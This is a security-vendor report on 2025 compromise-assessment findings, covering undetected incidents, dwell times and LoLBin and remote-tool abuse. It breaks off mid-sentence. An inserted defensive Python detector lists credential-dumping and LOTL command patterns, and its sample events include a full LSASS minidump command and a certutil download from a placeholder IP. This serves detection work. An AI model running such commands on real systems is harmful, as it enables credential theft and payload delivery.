Missed incidents, persistent threats, and response gaps: Insights from compromise assessment projects
Kaspersky's 2025 compromise assessments reveal missed incidents, persistent threats, and response gaps.
Summary
Kaspersky's 2025 compromise assessment findings highlight significant trends in undetected threats, with 60% of incidents missed due to lack of high-confidence alerts. Nearly a third of detected incidents persisted for over three months, and the oldest discovered threat had been active for four years. The analysis also points to the reliance of threat actors on LoLBins and remote management tools, and the critical need for continuous monitoring and proactive threat hunting to mitigate high-severity compromises.
Full text
Table of Contents
Key trends observed during compromise assessment engagements
About the Kaspersky Compromise Assessment service
Detection logic families
Reasons for requesting Kaspersky Compromise Assessment services
Case study: Dormant threat uncovered only by a compromise assessment
Missed long-term incidents
Case study: Four-year-old crypto mining activity on domain controllers
Unintentional malware preservation
Legitimate, yet suspicious: LoLBins and remote management tools
Impact of not having continuous monitoring and proactive threat hunting
Case study: Secure by design without continuous monitoring
Incident response action statistics
Why forensic collection is the default entry point
Containment: The remove files/registry keys paradox
Communication failures: An additional operational overhead
The iterative nature of response plan updates
Distinguishing real attacker artifacts from penetration testing leftovers
Incident response maturity and its effect on severity
Case study: In-memory LionTail infection on critical Windows servers
Solving the root cause problems
Common observations on root causes
Lack of detections: Causes and impacts
Case study: In-memory PurpleFox infection evades conventional endpoint protection
Insufficient vulnerability management: A catalyst for high-severity compromises
Case study: How overly permissive GPO-based software distribution goes wrong
Conclusion

Authors: Victor Sergeev, Amged Wageh

The following analysis presents the key findings from Kaspersky Compromise Assessment engagements performed in 2025. A compromise assessment is an independent, expert-driven service that examines whether a target network has been compromised. The service combines threat intelligence analysis (including darknet sources), tool-aided endpoint scanning, a systematic review of security event logs and network traffic, and, when necessary, an initial incident response and digital forensic investigation.
This report focuses on missed incidents: threats that remained undetected for weeks, months, or even years.

Key trends observed during compromise assessment engagements

Proactive compromise assessment decreases the number of missed high-severity incidents. The highest proportions of high-severity incidents were revealed in organizations that requested our compromise assessment service after containing a known incident. The lowest proportions of high-severity incidents were observed in organizations that conducted regular audits. Of all the incidents discovered, 20% were found manually, while enterprises missed 60% because the tools in place produced no high-confidence alerts.

Nearly a third of discovered incidents took over three months to detect. The longer a threat persisted in the target environment, the greater the likelihood that the incident would be severe. 30.8% of incidents had activity spanning more than three months, and 52% of high-severity compromises were discovered only after more than 90 days undetected. The oldest incident discovered in 2025 had gone undetected for four years.

Malicious files often remain in backups and are restored after incident response activities. 40% of all discovered web shells resided in backups and went unnoticed until a proper compromise assessment was conducted.

Threat actors rely on remote management tools and LoLBins. These types of tools were found in every compromise assessment engagement that resulted in an incident detection.

Monitoring tools and controls are not self-sufficient; operational maturity makes the difference. Monitoring tools must be configured and adapted to the changing threat landscape, and human analysts need to review low-confidence alerts. A lack of continuous monitoring and threat hunting activities increased the likelihood of high- and medium-severity incidents to 84–86%.
At the same time, high-severity incidents were rare among organizations with in-house capabilities to reverse-engineer malware.

Communication issues lead to missed incidents. Nearly a third of the compromise assessments revealed communication issues that impacted incident response activities.

The incident response playbook is not set in stone. For incident response to be efficient and effective, playbooks must be updated as new artifacts are discovered. Treating the incident response plan as a living document reduces the risk of missing threats.

About the Kaspersky Compromise Assessment service

Our global compromise assessment portfolio spans several regions. In 2025, around 71% of the incidents we identified affected our customers in the META region, while the APAC and CIS regions accounted for the remaining 29%.

Geographic distribution of incidents identified during Kaspersky Compromise Assessment projects in 2025

Our service was requested by organizations from a diverse set of sectors. The government sector accounted for around 29% of incidents, followed by the education (19%) and financial (17%) sectors.

Distribution of incidents by economic sector identified during Kaspersky Compromise Assessment projects in 2025

Detection logic families

Our compromise assessments operate on a continuously updated catalogue of indicators of attack (IoAs). Because the raw set of IoAs is too granular for high-level reporting, we map them to a concise set of detection logic families. The statistics indicate that three detection families dominate the incident mix:

Credentials from dumps: 12.4% of all incidents;
Specific living-off-the-land (LOTL) tools: 11.2%;
Specific malware families: 11.2%.

These three detection logic families represent high-fidelity indicators of attack that reliably signal infrastructure compromises ranging from dormant, disk-based malware to persistent and multi-stage attacks.
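The mapping of granular IoAs to detection logic families, together with the earlier observations that LoLBins and remote management tools appeared in every engagement with a detection and that low-confidence alerts still need a human reviewer, can be illustrated with a small classifier. The Python below is an added example and is not Kaspersky's own tooling. It maps constructed process-creation events to three families named in the report (Credentials from dumps, Specific LOTL tools, Remote management tools; the "Specific malware families" family is omitted because it would need signature content the report does not provide), assigns each hit a confidence level, and routes low-confidence hits to a review queue instead of dropping them. The regex rules, the RMM binary list, the approved-tool set, and the sample events are all illustrative assumptions.

```python
"""Group process-creation events into detection logic families.

Added example, not Kaspersky's own tooling. Regex rules, the RMM binary
list, the approved-tool set and the sample events are illustrative
assumptions chosen to mirror the report's family names.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    family: str
    rule: str
    confidence: str   # "high": act on it; "low": queue for analyst review
    command_line: str


# (family, rule name, confidence, regex applied to "<image> <command line>", lower-cased)
RULES = [
    ("Credentials from dumps", "lsass_minidump_comsvcs", "high",
     r"rundll32(\.exe)?\s+.*comsvcs\.dll.*minidump"),
    ("Credentials from dumps", "procdump_lsass", "high",
     r"procdump.*\s-ma\s+lsass"),
    ("Credentials from dumps", "ntds_or_sam_extract", "high",
     r"ntdsutil.*\bac\s+i\s+ntds|reg(\.exe)?\s+save\s+hklm\\(sam|security|system)"),
    ("Specific LOTL tools", "certutil_download_or_decode", "high",
     r"certutil(\.exe)?\s+.*(-urlcache|-decode)"),
    ("Specific LOTL tools", "mshta_remote_script", "high",
     r"mshta(\.exe)?\s+.*https?://"),
    ("Specific LOTL tools", "regsvr32_remote_scriptlet", "high",
     r"regsvr32(\.exe)?\s+.*/i:https?://.*scrobj\.dll"),
    # Encoded PowerShell and BITS transfers are common in admin scripts too,
    # so they are low confidence: not dropped, but routed to a human.
    ("Specific LOTL tools", "powershell_encoded", "low",
     r"powershell(\.exe)?\s+.*\s-(e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}"),
    ("Specific LOTL tools", "bitsadmin_transfer", "low",
     r"bitsadmin(\.exe)?\s+.*/transfer"),
]

# Legitimate remote management tools often abused by intruders (illustrative, not exhaustive).
RMM_TOOLS = {"anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe",
             "ateraagent.exe", "rustdesk.exe", "ammyy.exe"}


def classify(event, approved_rmm=frozenset()):
    """Return the Findings one event triggers. `approved_rmm` holds the RMM
    binaries the organisation sanctions: an unsanctioned RMM binary is high
    confidence, a sanctioned one is still surfaced, but at low confidence."""
    image = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    text = f'{event["image"]} {event["command_line"]}'.lower()
    findings = [
        Finding(event["host"], family, rule, conf, event["command_line"])
        for family, rule, conf, pattern in RULES
        if re.search(pattern, text)
    ]
    if image in RMM_TOOLS:
        conf = "low" if image in approved_rmm else "high"
        findings.append(Finding(event["host"], "Remote management tools",
                                f"rmm_{image}", conf, event["command_line"]))
    return findings


def summarize(events, approved_rmm=frozenset()):
    """Classify all events; return (all findings, count per family, low-confidence queue)."""
    findings = [f for e in events for f in classify(e, approved_rmm)]
    per_family = Counter(f.family for f in findings)
    review_queue = [f for f in findings if f.confidence == "low"]
    return findings, per_family, review_queue


# Constructed sample telemetry; hosts, paths and the IP address are invented.
SAMPLE_EVENTS = [
    {"host": "dc01", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Temp\l.dmp full"},
    {"host": "web02", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Temp\u.txt"},
    {"host": "ws117", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "command_line": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service'},
    {"host": "ws042", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "command_line": r'"C:\Program Files\TeamViewer\TeamViewer.exe"'},
    {"host": "fs01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws042", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\helpdesk1\notes.txt"},
]

if __name__ == "__main__":
    found, per_family, queue = summarize(SAMPLE_EVENTS, approved_rmm=frozenset({"teamviewer.exe"}))
    for f in found:
        print(f"{f.confidence:<4} {f.host:<6} {f.family:<24} {f.rule}")
    print(dict(per_family))
    print(f"{len(queue)} low-confidence hit(s) routed to analyst review")
```

On the sample telemetry the LSASS MiniDump, certutil download and unsanctioned AnyDesk hits come out as high confidence, while the sanctioned TeamViewer launch and the encoded PowerShell stay in the review queue rather than being silently discarded; the notepad event produces nothing. The rule patterns are deliberately narrow and would need tuning against an environment's own baseline before being trusted as high confidence.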
Distribution of detection logic families

Reasons for requesting Kaspersky Compromise Assessment services

Analysis of our compromise assessment engagements that took place in 2025 reveals a clear correlation between the stated purpose of the engagement and the risk profile of the findings. General audits dominate the portfolio with 56% of requests, followed by authority reporting engagements (19%), post-incident checkups (17%), and acquisitions (9%).

Statistics on the reasons behind CA project requests

When the findings are classified by severity, the post-incident checkup category exhibits the highest proportion of high-severity incidents (40.7%). The full breakdown is shown below.

Incident severity breakdown by service engagement reason (incident severity, %)

Reason for service                          High   Medium   Low
Acquiring new company                       28.6   42.8     28.6
General audit                               27.7   36.7     35.6
Report to an authority                      30.0   46.7     23.3
Checkup after a cybersecurity incident      40.7   25.9     33.4

Post-incident checkups are frequently initiated after an initial incident response (IR) effort. The elevated share of high-severity findings suggests that IR activities, which are typically limited to containing a known incident, do not provide a complete view of the broader environment. Consequently, other threats may remain undetected until a full compromise assessment is performed.

Merger and acquisition-related assessments are proactive assessments performed when a company acquires another entity: the target's network is scanned for hidden threats before the two environments are merged. These assessments show a balanced severity distribution: 28.6% low-severity, 42.8% medium-severity, and 28.6% high-severity. This reflects the mixed risk posture of acquisition targets, which are often evaluated for both known vulnerabilities and hidden malicious activity.
Similarly, other proactive approaches like general audit assessments or assessments driven by the need to regularly submit a compliance report to a regulatory authority, share almost the same ratio. This indicates that regular, proactive and compliance-oriented assessments tend to reveal substantive issues earlier in the attack lifecycle, reducing the lik
Indicators of Compromise
- malware — PurpleFox
- malware — LionTail